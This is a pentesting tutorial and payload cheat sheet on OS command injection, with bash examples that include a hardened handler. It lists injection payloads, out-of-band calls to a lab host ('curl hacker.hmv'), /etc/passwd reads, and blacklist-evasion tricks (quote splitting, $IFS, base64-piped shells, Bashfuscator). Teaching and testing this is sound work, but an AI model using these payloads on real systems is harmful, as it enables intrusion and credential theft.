
Command Injection

Theory

Command Injection allows an attacker to execute operating-system commands on the host where the application runs. It occurs when the application passes unsanitized user input to a function that hands the string to a system shell (system(), shell_exec(), popen(), subprocess with shell=True and the like), so shell metacharacters in the input are parsed as new commands instead of being treated as data.
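The sink described above, as an added example that is not part of the original page: a CGI-style "ping" handler written the vulnerable way and the hardened way. Function names are this example's own, and `echo PING` stands in for `ping -c 1` so it runs offline.

```bash
#!/usr/bin/env bash
# Added example (not from the original page). The handler takes one
# request parameter, the host to ping. `echo PING` replaces the real
# `ping -c 1` so the script runs without network access.

# VULNERABLE: the parameter is spliced into a command line that a shell
# re-parses, so a separator in the input starts a second command.
ping_vulnerable() {
    sh -c "echo PING $1"
}

# HARDENED: allow-list the value (hostname / IPv4 characters only) and pass
# it as its own argv element. No shell re-parses the string, so even a
# separator that slipped past the allow-list would be an odd hostname,
# not a command. With the real binary this would be: ping -c 1 -- "$host"
ping_hardened() {
    local host=$1
    case $host in
        ''|*[!A-Za-z0-9.-]*) echo "rejected: $host" >&2; return 1 ;;
    esac
    echo PING "$host"
}

# Demo with the injection from the page's in-band section.
ping_vulnerable '127.0.0.1; id'                      # prints PING line, then id output
ping_hardened '127.0.0.1; id' || echo '(input refused, nothing executed)'
ping_hardened 127.0.0.1                              # PING 127.0.0.1
```

The allow-list is the first line of defence, but the property that actually removes the bug is the second one: the hardened handler never gives the input to a shell at all.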

Types of Command Injection

In-band Command Injection:

  1. Identify input that reaches a system command (ping, nslookup, file conversion, etc.)
  2. Test separators ; && || | and a newline
  3. Execute a command whose output is returned in the response
; whoami
&& uname -a
| ls

Blind Command Injection

  1. Prepare listener
  2. Inject payload
  3. Confirm OOB execution
  4. Adjust payload
; ping -c 1 hacker.hmv
&& curl hacker.hmv

Time-Based

  1. Measure normal response time
  2. Inject sleep/ping
  3. Detect delay
; sleep 5
&& ping -c 5 127.0.0.1
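The three time-based steps (measure the baseline, inject a sleep, detect the delay) as a reusable check. This is an added example, not code from the original page: the request is simulated with a vulnerable `sh -c` sink so it runs offline; against a real target you would time a curl call in its place. Function names and the 80 % margin are this example's own assumptions.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): time-based confirmation of
# command injection, with the HTTP request replaced by a local sink.

# now_ns: wall-clock nanoseconds (GNU date %N; whole seconds elsewhere).
now_ns() {
    local t
    t=$(date +%s%N)
    case $t in *N) t=$(( $(date +%s) * 1000000000 )) ;; esac   # non-GNU date
    printf '%s' "$t"
}

# measure_ms CMD [ARG...]: run CMD, discard its output, print elapsed milliseconds.
measure_ms() {
    local start end
    start=$(now_ns)
    "$@" >/dev/null 2>&1
    end=$(now_ns)
    printf '%d' $(( (end - start) / 1000000 ))
}

# sink VALUE: stand-in for the vulnerable request handler (input re-parsed by a shell).
sink() {
    sh -c "echo PING $1"
}

# delay_detected BASELINE INJECTED SECONDS: succeed if the injected request
# took at least 80 % of SECONDS longer than the baseline. The margin absorbs
# process start-up jitter; on a network target take several samples and use
# a longer sleep (the page's 5 s) rather than trusting a single request.
delay_detected() {
    local base inj
    base=$(measure_ms sink "$1")
    inj=$(measure_ms sink "$2")
    printf 'baseline %d ms, injected %d ms\n' "$base" "$inj" >&2
    [ $(( inj - base )) -ge $(( $3 * 800 )) ]
}

# Demo: baseline vs. an injected one-second sleep.
if delay_detected '127.0.0.1' '127.0.0.1; sleep 1' 1; then
    echo 'time-based injection confirmed'
else
    echo 'no measurable delay'
fi
```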

Workflow

  1. Detect entry points

    • GET/POST.
    • Headers: User-Agent, Referer, X-Forwarded-For.
    • Cookies: Sessions, etc.
    • Uploaded files: the file name and its metadata.
  2. Probe which characters the filter blocks (separators, spaces, quotes) and which pass.

    p=127.0.0.1;
    p=127.0.0.1&
    p=127.0.0.1%0a
    

Note

You can use ffuf with the SecLists dictionary Fuzzing/command-injection-commix.txt

  3. Confirm execution

    ; whoami
    && uname -a
    | ls
    

  4. If the payload is blocked or errors out, apply the bypasses below for spaces, separators and blacklisted words.

Bypasses

Separator Bypass

If separators like ; && || | are filtered, a URL-encoded newline is the most reliable replacement: the shell ends a command at a newline exactly as it does at ;:

p=127.0.0.1%0a%09
%0a
%0d

Space/Tab Bypass

If spaces are filtered, use a tab (%09), the $IFS variable (whose default value contains a space, so the shell splits on it) or brace expansion, which bash turns into separate arguments:

cat${IFS}/etc/passwd
%09
127.0.0.1%0a${IFS}
127.0.0.1%0a{ls,-la}
127.0.0.1%0a{cat,/etc/passwd}
127.0.0.1%0a${IFS}ls${IFS}-la
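Workflow step 2 and the two bypass sections above, worked through in code. This is an added example, not part of the original page: a toy blacklist filter of the kind these bypasses defeat, a URL decoder, and a vulnerable `bash -c` sink; try_payload runs a URL-encoded payload through all three and reports whether the canary command executed. Function names and the filter rule are this example's own assumptions.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): separator and space bypasses
# against a naive character blacklist, checked end to end.

# url_decode STR: turn %XX into the byte it encodes and + into a space
# (bash's printf %b understands \xHH escapes).
url_decode() {
    local s=${1//+/ }
    printf '%b' "${s//%/\\x}"
}

# blocked STR: succeed (0) if the filter would reject the input.
# Rule assumed here: any of ; & | or a literal space is forbidden.
blocked() {
    case $1 in
        *\;*|*\&*|*\|*|*' '*) return 0 ;;
    esac
    return 1
}

# sink STR: the vulnerable application code, splicing input into a shell line.
# `echo PING` stands in for `ping -c 1` so the example runs offline.
sink() {
    bash -c "echo PING $1"
}

# try_payload URLENCODED: prints blocked, executed or no-exec. The payload
# should try to run `echo CANARY`; "executed" means the injected command
# ran despite the filter.
try_payload() {
    local decoded
    decoded=$(url_decode "$1")
    if blocked "$decoded"; then
        echo blocked
    elif sink "$decoded" 2>/dev/null | grep -q CANARY; then
        echo executed
    else
        echo no-exec
    fi
}

# Demo: the page's separator and space bypasses against the filter.
for p in \
    '127.0.0.1' \
    '127.0.0.1;echo CANARY' \
    '127.0.0.1%0aecho CANARY' \
    '127.0.0.1%0aecho${IFS}CANARY' \
    '127.0.0.1%0a{echo,CANARY}' \
    '127.0.0.1%0aecho%09CANARY'; do
    printf '%-35s %s\n' "$p" "$(try_payload "$p")"
done
```

The third payload shows why the space bypass matters: the newline gets past the separator rule, but the plain `echo CANARY` is still caught by the space rule, while `${IFS}`, a tab and brace expansion all produce the same two-word command without ever sending a space.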

WAF / Blacklisted Commands Bypass

If command names like cat, ls, id, whoami are matched as literal words, split the word with quotes, backslashes or an empty expansion ($@ expands to nothing when there are no positional parameters); the shell removes them before exec. Alternatively hide the word entirely, e.g. in base64 (aWQ= is id):

w'h'o'a'm'i
w'h'o'am'i
w"h"o"am"i
who$@ami
w\ho\am\i
$(echo id)
echo aWQ= | base64 -d | sh
127.0.0.1%0aw'h'o'am'i

Encoding Bypass

If special characters are filtered, encode them. Single URL-encoding is undone by the web server before the value reaches the shell, so it only hides the character from a filter that inspects the raw request; double encoding is needed when the filter looks at the once-decoded value and the application decodes again. Hex and Unicode escapes need something on the target to interpret them (echo -e, printf, $'...').

Encoding      Example
URL encode    %3B%20id
Double URL    %253B%2520id
Hex           \x69\x64
Unicode       \u0069\u0064

echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd

ENV Character Bypass

Characters can also be taken from environment variables with substring expansion (${VAR:offset:length}), so the character itself never appears in the request:

echo ${PATH:0:1}
/
echo ${LS_COLORS:10:1}
;

To add semicolon + space + id:
127.0.0.1${LS_COLORS:10:1}${IFS}id

The offsets depend on the target's environment: PATH almost always starts with /, but LS_COLORS is often unset for a web server user. Also note that a character produced by expansion is data, not a shell operator. ${PATH:0:1} gives a usable / inside a path, but the ; above only separates commands if the resulting string is parsed a second time (eval, a nested shell); otherwise prefer %0a as the separator.

Case Sensitive

If the filter matches command names case-sensitively, send the command in mixed case and normalize it on the target, or hide the word by reversing or encoding it:

$(tr "[A-Z]" "[a-z]"<<<"whOaMi")
$(a="whOaMi";printf %s "${a,,}")
echo 'whoami' | rev
$(rev<<<'imaohw')

Or base64-encode the whole command and decode it on the target:

echo -n 'cat /etc/passwd | grep 33' | base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
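The ENV-character, case-sensitive and base64 sections above, as one added example that is not part of the original page: helpers that build those obfuscated forms from a plain command, plus a runner that executes a form in a fresh bash so you can confirm it still does what the plain command does. Function names (env_char_ref, quote_split, b64_wrap, run_form) and the LS_SAMPLE variable are this example's own.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): building and verifying
# blacklist-evading forms of a command.

# env_char_ref VAR CHAR: print a ${VAR:offset:1} expression that expands to
# CHAR, using the first occurrence of CHAR in VAR's current value.
# Fails (1) when CHAR is absent, e.g. LS_COLORS unset in the target's env.
env_char_ref() {
    local var=$1 ch=$2 val=${!1} i
    for ((i = 0; i < ${#val}; i++)); do
        if [[ ${val:i:1} == "$ch" ]]; then
            printf '${%s:%d:1}' "$var" "$i"
            return 0
        fi
    done
    return 1
}

# quote_split CMD: wrap each alphanumeric in single quotes
# (whoami -> 'w''h''o''a''m''i'); bash drops the quotes before exec, but a
# keyword blacklist no longer sees the word. Spaces are left alone so the
# argument boundaries survive.
quote_split() {
    local cmd=$1 out='' c i
    for ((i = 0; i < ${#cmd}; i++)); do
        c=${cmd:i:1}
        case $c in
            [A-Za-z0-9]) out+="'$c'" ;;
            *)           out+=$c ;;
        esac
    done
    printf '%s' "$out"
}

# b64_wrap CMD: base64 the command and wrap it in the page's
# bash<<<$(base64 -d<<<...) form, so no command word appears in the request.
b64_wrap() {
    local b64
    b64=$(printf '%s' "$1" | base64 | tr -d '\n')
    printf 'bash<<<$(base64 -d<<<%s)' "$b64"
}

# run_form FORM: execute a form the way a `sh -c "ping ... $input"` sink
# would, in a fresh bash, and return its stdout.
run_form() {
    bash -c "$1"
}

# Demo. LS_SAMPLE is a constructed stand-in for a typical LS_COLORS prefix.
export LS_SAMPLE='rs=0:di=01;34:ln=01;36'
env_char_ref PATH /; echo                 # ${PATH:0:1} when PATH starts with /
env_char_ref LS_SAMPLE ';'; echo          # ${LS_SAMPLE:10:1}
run_form "$(quote_split 'id -u')"
run_form "$(b64_wrap 'id -u')"
# Caveat: a character produced by expansion is data, not an operator.
run_form 'echo x${LS_SAMPLE:10:1}echo${IFS}INJ'         # prints: x;echo INJ
run_form 'eval echo x${LS_SAMPLE:10:1}echo${IFS}INJ'    # re-parsed: prints x, then INJ
```

The last two lines are the check worth running before relying on ${LS_COLORS:10:1} as a separator: without a second parse (eval here) the semicolon stays inside an argument, which is also why the same trick is perfectly good for building a / in a path.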

Note

More payloads at PayloadsAllTheThings

Evasion Tools

Bashfuscator

Installation:

git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
pip3 install setuptools==65
python3 setup.py install --user
cd ./bashfuscator/bin/

Usage:

bashfuscator -c "cat /etc/passwd"